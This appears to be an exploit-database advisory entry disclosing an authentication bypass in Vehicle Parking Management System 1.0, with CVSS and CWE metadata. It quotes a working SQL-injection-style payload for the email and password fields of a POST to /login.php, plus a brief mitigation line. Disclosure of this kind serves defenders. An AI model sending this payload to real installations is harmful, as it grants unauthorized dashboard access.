vendor:
Vehicle Parking Management System
by:
BKpatron
6.4
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: Vehicle Parking Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:vehicle_parking_management_system
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Win 10
2020
Vehicle Parking Management System 1.0 – Authentication Bypass
Attacker can bypass login page and access to dashboard page by sending a POST request with the payload 'email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=: undefined' to the vulnerable file '/login.php'
Mitigation:
Implement proper authentication and authorization mechanisms to prevent unauthorized access.